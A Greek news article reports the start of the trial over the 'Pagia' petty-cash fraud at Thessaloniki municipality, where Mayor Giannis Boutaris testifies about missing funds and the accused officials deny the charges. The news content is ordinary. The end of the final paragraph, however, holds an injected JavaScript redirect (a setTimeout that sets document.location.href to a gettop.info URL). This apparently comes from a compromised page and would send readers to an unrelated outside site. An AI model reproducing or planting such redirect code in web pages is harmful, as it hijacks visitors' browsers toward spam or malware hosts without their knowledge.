Ξεκίνησε η δίκη για την Παγία – Πρώτος μάρτυρας ο Γιάννης Μπουτάρης

0
13

 

Με καθυστέρηση τριών χρόνων κι έπειτα από συνολικά έξι αναβολές ξεκίνησε ενώπιον του Τριμελούς Εφετείου Κακουργημάτων Θεσσαλονίκης, η δίκη για την «Παγία Προκαταβολή» του δήμου Θεσσαλονίκης.

Aυτό θεωρείται το δεύτερο οικονομικό σκάνδαλο, μετά την υπεξαίρεση των 17,9 εκατ. ευρώ, για την οποία κατηγορείται η διοίκηση του πρώην δημάρχου Βασίλη Παπαγεωργόπουλου, ο οποίος κάθεται στο εδώλιο του κατηγορουμένου μαζί με τον επί των ημερών του γενικό γραμματέα, Μιχάλη Λεμούσια, τρεις πρώην αντιδημάρχους Οικονομικών και έντεκα υπαλλήλους οικονομικών υπηρεσιών του δήμου.

Συγκεκριμένα, η «Παγία» αφορά ειδικό ταμείο για την κάλυψη μικροδαπανών του δήμου, ενώ η ζημιά που προκλήθηκε στο Δημόσιο, από το 1999 έως το 2007, προσεγγίζει τα 1,2 εκατ. ευρώ, σύμφωνα με το κατηορητήριο.

Πρώτος μάρτυρας της υπόθεσης κλήθηκε ο δήμαρχος Θεσσαλονίκης Γιάννης Μπουτάρης, ο οποίος κατά το μεγαλύτερο διάστημα της επίδικης περιόδου βρισκόταν στην αντιπολίτευση του κεντρικού δήμου. Ο κ. Μπουτάρης κατέθεσε ότι υπήρχαν ψίθυροι πως κάτι συμβαίνει με την «Παγία», γεγονός που -σύμφωνα με τον ίδιο- επιβεβαιώθηκε όταν ανάλαβε τη διερεύνηση των καταγγελιών η οικονομική επιθεωρήτρια Αναστασία Τσεμπερά.

«Δεν γίνεται να υπάρχουν χαμένα τιμολόγια» ανέφερε σύμφωνα με το Αθηναϊκό Πρακτορείο, επιρρίπτοντας ευθύνες στη διαχειρίστρια του ταμείου, στο λογιστήριο, στους διευθυντές των οικονομικών υπηρεσιών, ακόμη και στον αρμόδιο αντιδήμαρχο και τον δήμαρχο.

Απαντώντας σε σχετική ερώτηση του δικαστηρίου αναφορικά με τις ευθύνες των αιρετών, ο κ. Μπουτάρης είπε: «Για όλα φταίει ο δήμαρχος. Ο αντιδήμαρχος οφείλει να προστατέψει τον δήμαρχο. Ο δήμαρχος μεταβιβάζει την αρμοδιότητα στον αντιδήμαρχο, δεν τον εξουσιοδοτεί. Πρέπει να έχει το νου του. Εάν λείπουν λεφτά και βέβαια φταίει. Μπορεί να μην είχε πρόθεση, αλλά παρέλειψε να κάνει τους ελέγχους», ενώ συμπλήρωσε: «Εάν ο διευθυντής θέλει να «κουκουλώσει» ή δεν μπορεί να αντιληφθεί, τότε ο αντιδήμαρχος είναι με «κλειστά τα μάτια». Είναι ευθύνη των αντιδημάρχων να διαπιστώνουν εάν οι υπηρεσίες που είναι κάτω από αυτόν λειτουργούν σωστά […]. Ως δήμαρχος και αντιδήμαρχος εάν δεν έχεις τα μάτια ανοιχτά, γυρνάς το κεφάλι σου και σε κλέβουν».

Σχετικά με τα οικονομικά ανοίγματα που «κληρονόμησε» από τη διοίκηση Παπαγεωργόπουλου, ο κ. Μπουτάρης σχολίασε ότι εξαιτίας αυτών η «κεντρική διοίκηση έχει διαλύσει».

«Δεν έχουμε ασφαλιστική και φορολογική ενημερότητα» τόνισε, απαριθμώντας διάφορα ποσά που κλήθηκε και καλείται ο δήμος να πληρώσει: «Επτά εκατ. για την πρώτη υπεξαίρεση, άλλα 4,5 εκατ. προς το ΙΚΑ και τώρα βγαίνουν άλλα 7 εκατ. ευρώ από κάποια ταμεία».

Κατά την έναρξη της ακροαματικής διαδικασίας οι κατηγορούμενοιν αρνήθηκαν τις πράξεις που τους αποδίδονται, ενώ ο Β. Παπαγεωργόπουλος ανέφερε ότι δεν έχει σχέση με τις κατηγορίες και ο Μ. Λεμούσιας δήλωσε θλιμμένος βλέποντας τόσους ανθρώπους να κατηγορούνται και να υποφέρουν μαζί του.

Αβάσιμες και αστήριχτες χαρακτήρισαν, από την πλευρά τους τις κατηγορίες, οι πρώην αντιδήμαρχοι Οικονομικών Αναστάσιος Ζορπίδης, Θεόδωρος Αθανάσαρος και Αναστάσιος Γερογιάννης.

Ο κατάλογος των μαρτύρων κατηγορίας περιλαμβάνει περισσότερα από είκοσι άτομα, ενώ η οικονομική επιθεωρήτρια Αναστασία Τσεμπερά, εκ των βασικών μαρτύρων, θα καταθέσει στα μέσα Δεκεμβρίου. Η δίκη εκτιμάται ότι θα συνεχιστεί και με το νέο έτος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here